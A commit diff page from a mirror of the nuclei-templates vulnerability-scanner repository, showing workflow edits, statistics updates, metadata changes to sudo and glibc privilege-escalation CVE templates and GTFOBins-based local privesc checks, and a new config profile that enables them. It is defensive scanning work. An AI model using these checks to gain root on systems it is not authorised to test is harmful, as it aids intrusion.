daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into phishing-templates

patch-1
Prince Chaddha 2024-03-08 13:04:54 +05:30 committed by GitHub
parent c0ac93351d 7f071a1f5a
commit c287ba0142
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
744 changed files with 14094 additions and 7290 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
.github/workflows/cache-purge.yml vendored
View File

@ -1,22 +0,0 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}

1
.github/workflows/syntax-checking.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
- name: Yamllint

1
.github/workflows/template-sign.yml vendored
View File

@ -11,6 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

1
.github/workflows/template-validate.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

1
.github/workflows/templates-stats.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:

35
.github/workflows/templates-sync.yml vendored
View File

@ -3,43 +3,10 @@ on:
push:
paths:
- '.new-additions'
- 'code/cves/2023/CVE-2023-6246.yaml'
- 'http/cves/2007/CVE-2007-3010.yaml'
- 'http/cves/2011/CVE-2011-4640.yaml'
- 'http/cves/2021/CVE-2021-40651.yaml'
- 'http/cves/2022/CVE-2022-38131.yaml'
- 'http/cves/2023/CVE-2023-28662.yaml'
- 'http/cves/2023/CVE-2023-47115.yaml'
- 'http/cves/2023/CVE-2023-52085.yaml'
- 'http/cves/2023/CVE-2023-6360.yaml'
- 'http/cves/2023/CVE-2023-6909.yaml'
- 'http/cves/2024/CVE-2024-1061.yaml'
- 'http/cves/2024/CVE-2024-21644.yaml'
- 'http/cves/2024/CVE-2024-21645.yaml'
- 'http/cves/2024/CVE-2024-21893.yaml'
- 'http/cves/2024/CVE-2024-22024.yaml'
- 'http/default-logins/webmethod/webmethod-integration-server-default-login.yaml'
- 'http/exposed-panels/apigee-panel.yaml'
- 'http/exposed-panels/dockge-panel.yaml'
- 'http/exposed-panels/easyjob-panel.yaml'
- 'http/exposed-panels/friendica-panel.yaml'
- 'http/exposed-panels/ivanti-connect-secure-panel.yaml'
- 'http/exposed-panels/juniper-panel.yaml'
- 'http/exposed-panels/ms-exchange-web-service.yaml'
- 'http/exposed-panels/pairdrop-panel.yaml'
- 'http/exposed-panels/passbolt-panel.yaml'
- 'http/exposed-panels/sentry-panel.yaml'
- 'http/exposed-panels/vistaweb-panel.yaml'
- 'http/exposures/logs/teampass-ldap.yaml'
- 'http/miscellaneous/balada-injector-malware.yaml'
- 'http/misconfiguration/node-express-dev-env.yaml'
- 'http/misconfiguration/sap/sap-public-admin.yaml'
- 'http/technologies/google/chromecast-detect.yaml'
- 'http/technologies/identity-server-v3-detect.yaml'
- 'http/vulnerabilities/wordpress/wp-user-enum.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
if: github.repository == 'projectdiscovery/nuclei-templates'
runs-on: ubuntu-latest
steps:
- name: Trigger Remote Workflow with curl

1
.github/workflows/wordpress-plugins-update.yml vendored
View File

@ -6,6 +6,7 @@ on:
jobs:
Update:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Check out repository code
uses: actions/checkout@v4

34
.new-additions
View File

@ -1,34 +0,0 @@
code/cves/2023/CVE-2023-6246.yaml
http/cves/2007/CVE-2007-3010.yaml
http/cves/2011/CVE-2011-4640.yaml
http/cves/2021/CVE-2021-40651.yaml
http/cves/2022/CVE-2022-38131.yaml
http/cves/2023/CVE-2023-28662.yaml
http/cves/2023/CVE-2023-47115.yaml
http/cves/2023/CVE-2023-52085.yaml
http/cves/2023/CVE-2023-6360.yaml
http/cves/2023/CVE-2023-6909.yaml
http/cves/2024/CVE-2024-1061.yaml
http/cves/2024/CVE-2024-21644.yaml
http/cves/2024/CVE-2024-21645.yaml
http/cves/2024/CVE-2024-21893.yaml
http/cves/2024/CVE-2024-22024.yaml
http/default-logins/webmethod/webmethod-integration-server-default-login.yaml
http/exposed-panels/apigee-panel.yaml
http/exposed-panels/dockge-panel.yaml
http/exposed-panels/easyjob-panel.yaml
http/exposed-panels/friendica-panel.yaml
http/exposed-panels/ivanti-connect-secure-panel.yaml
http/exposed-panels/juniper-panel.yaml
http/exposed-panels/ms-exchange-web-service.yaml
http/exposed-panels/pairdrop-panel.yaml
http/exposed-panels/passbolt-panel.yaml
http/exposed-panels/sentry-panel.yaml
http/exposed-panels/vistaweb-panel.yaml
http/exposures/logs/teampass-ldap.yaml
http/miscellaneous/balada-injector-malware.yaml
http/misconfiguration/node-express-dev-env.yaml
http/misconfiguration/sap/sap-public-admin.yaml
http/technologies/google/chromecast-detect.yaml
http/technologies/identity-server-v3-detect.yaml
http/vulnerabilities/wordpress/wp-user-enum.yaml

1
.nuclei-ignore
View File

@ -18,7 +18,6 @@ tags:
- "local"
- "brute-force"
- "bruteforce"
- "privesc"
- "phishing"
# The following templates have been excluded because they have weak matchers and may generate FP results.

18
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
**552 directories, 8061 files**.
**569 directories, 8193 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

9982
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

16
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |

4
cloud/enum/azure-vm-cloud-enum.yaml
View File

@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure,brute-force,enum
tags: cloud,cloud-enum,azure,bruteforce,enum
self-contained: true
@ -63,4 +63,4 @@ dns:
part: answer
words:
- "IN\tA"
# digest: 4a0a0047304502210099044650fcae81add403703f5262b5673a46eca139d542c751548b0f7aadcc9c022038fa381a6c09a5a8341ac70d7a4ed8339a48c947bbdd3f5bd22e5a336daf9cec:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950

17
code/cves/2019/CVE-2019-14287.yaml
View File

@ -9,11 +9,22 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.34299
epss-percentile: 0.96958
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
vendor: sudo_project
product: sudo
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true
@ -36,4 +47,4 @@ code:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950

14
code/cves/2021/CVE-2021-3156.yaml
View File

@ -10,8 +10,20 @@ info:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-3156
cwe-id: CWE-193
epss-score: 0.97085
epss-percentile: 0.99752
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: sudo_project
product: sudo
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
self-contained: true
@ -28,4 +40,4 @@ code:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950

6
code/cves/2023/CVE-2023-2640.yaml
View File

@ -21,8 +21,8 @@ info:
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.00047
epss-percentile: 0.14754
epss-score: 0.00174
epss-percentile: 0.53697
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ code:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950

15
code/cves/2023/CVE-2023-4911.yaml
View File

@ -10,16 +10,21 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- https://www.youtube.com/watch?v=1iV-CD9Apn8
- http://www.openwall.com/lists/oss-security/2023/10/05/1
- http://www.openwall.com/lists/oss-security/2023/10/13/11
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-4911
cwe-id: CWE-787
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
cwe-id: CWE-787,CWE-122
epss-score: 0.0171
epss-percentile: 0.87439
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
self-contained: true
code:
@ -34,4 +39,4 @@ code:
- type: word
words:
- "139" # Segmentation Fault Exit Code
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950

12
code/cves/2023/CVE-2023-6246.yaml
View File

@ -9,15 +9,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- https://access.redhat.com/security/cve/CVE-2023-6246
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-6246
cwe-id: CWE-787
cwe-id: CWE-787,CWE-122
epss-score: 0.00383
epss-percentile: 0.72435
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,linux,privesc,local
self-contained: true
@ -33,4 +39,4 @@ code:
- type: word
words:
- "127" # Segmentation Fault Exit Code
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-choom.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/choom/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,choom,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-find.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/find/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,find,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-lua.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/lua/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,lua,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-mysql.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/mysql/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,mysql,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-node.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/node/
metadata:
max-request: 4
verified: true
max-request: 4
tags: code,linux,node,privesc,local
self-contained: true
@ -53,4 +53,4 @@ code:
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-rc.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/rc/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,rc,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-run-parts.yaml
View File

@ -8,8 +8,8 @@ info:
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,run-parts,privesc,local
self-contained: true
@ -45,4 +45,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-strace.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/strace/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,strace,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-torify.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/torify/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,torify,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-view.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/view/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,view,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/binary/privesc-xargs.yaml
View File

@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/xargs/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,xargs,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950

4
code/privilege-escalation/linux/rw-shadow.yaml
View File

@ -7,8 +7,8 @@ info:
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
max-request: 2
verified: true
max-request: 2
tags: code,linux,privesc,local
self-contained: true
@ -42,4 +42,4 @@ code:
words:
- "Not readable and not writable"
negative: true
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950

39
config/README.md Normal file
View File

@ -0,0 +1,39 @@
## About
This directory hosts Nuclei configuration profiles specifically designed for various use cases, including Bug Bounty, OSINT, and Compliance. The centerpiece of these configurations is the `recommended.yml` file, which offers a handpicked selection of templates that are both efficient and relevant for the majority of scanning scenarios. This curated approach is intended to provide a more focused scanning experience, reducing the occurrence of irrelevant results that often accompany broader scans.
## Usage
The Nuclei configuration profiles are straightforward to integrate into your existing scanning workflows. Below are guidelines on how to utilize the `recommended.yml` configuration for a streamlined scanning process, as well as instructions for customizing your scans to fit specific needs.
### Using the Recommended Configuration
To execute a scan with the `recommended.yml` configuration, which has been optimized for general use to yield efficient and relevant results, use the following command:
```
nuclei -config ~/nuclei-templates/config/recommended.yml
```
## Customizing Your Scanning Configuration
If you have specific requirements or wish to modify the focus of your scans, you can create a custom configuration file based on the structure of recommended.yml. Adjust the template selections to fit your targeted scanning objectives. Once your configuration is set, run Nuclei using your custom file with the command:
```
nuclei -config your-custom-config.yml
```
## Examples
Here are examples of how to run scans for specific scenarios:
#### Running Local Privilege Escalation Checks
For targeting local privilege escalation vulnerabilities, utilize the dedicated config as follows:
```
nuclei -config ~/nuclei-templates/config/privilege-escalation.yml
```
#### Config Focusing on OSINT
```
nuclei -config ~/nuclei-templates/config/osint.yml
```

7
config/privilege-escalation.yml Normal file
View File

@ -0,0 +1,7 @@
code: true
tags:
- privesc
include-tags:
- local

27
cves.json
View File

@ -265,6 +265,7 @@
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
